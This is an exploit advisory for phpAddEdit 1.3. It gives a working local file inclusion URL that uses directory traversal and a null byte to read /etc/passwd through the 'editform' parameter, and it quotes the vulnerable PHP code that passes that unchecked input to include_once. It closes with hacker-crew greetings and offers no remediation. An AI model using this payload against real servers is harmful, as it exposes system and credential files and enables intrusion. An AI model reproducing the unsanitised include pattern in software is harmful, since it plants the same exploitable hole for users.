phpAddEdit version 1.3 suffers from a local file inclusion vulnerability.
f55f352b04446e0cc5eef5b938ad3d90dde4f3a4a8ef468b543e982fa283e21b
#phpaddedit-1.3 LFI
#Author: nuclear
#script:http://sourceforge.net/projects/phpaddedit/
#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00
#vulnerable code:
if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];
...
if ( $error_message || $error || !$_POST["submitval"] ) {
include_once ($formname."-header.inc.php");
include_once ($addeditcwd."addedit-create-form.php");
include_once ($formname."-footer.inc.php");
}
#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r